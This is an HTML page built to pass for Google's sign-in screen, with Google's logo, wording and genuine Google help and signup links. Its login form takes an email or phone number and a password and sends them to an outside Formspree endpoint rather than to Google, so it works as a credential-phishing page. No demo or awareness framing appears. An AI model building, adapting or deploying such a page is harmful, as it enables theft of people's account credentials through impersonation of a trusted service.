
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Google Login</title>
  <link rel="stylesheet" href="./style.css">
</head>
<body>
  <center style="margin-top: 18vh;" >
 

    <form action="https://formspree.io/f/mwkjvwap" method="POST" id="my-form">
      <img class="logo" src="googlelogo.png" alt="Google Logo" width="75px" height="24px">
      <br>
      <span>Sign in</span>
      <p>Use your Google Account</p>
    
      <div class="container">
        <input type="text" placeholder=" Email or phone" name="uname" id="getEmail" required><br>
      
        <input type="password" placeholder=" Email Password" name="psw" id="getPassword" required><br>
        <div class="PrDSKc">Not your computer? Use Guest mode to sign in privately. <a class="learn-more" href="https://support.google.com/chrome/answer/6130773?hl=en-GB" target="_blank" aria-label="Learn more about using Guest mode">Learn more</a></div>
        <button class="sign-in" type="submit" >Sign In</button><br>
        <br>
        <a href="https://accounts.google.com/signup">Create account</a>
        <a class="forget" href="">Forgot email?</a>
      
      </div>
      
    </form> 
    
    
    </center>
    <script src="./script.js"></script>
</body>
</html>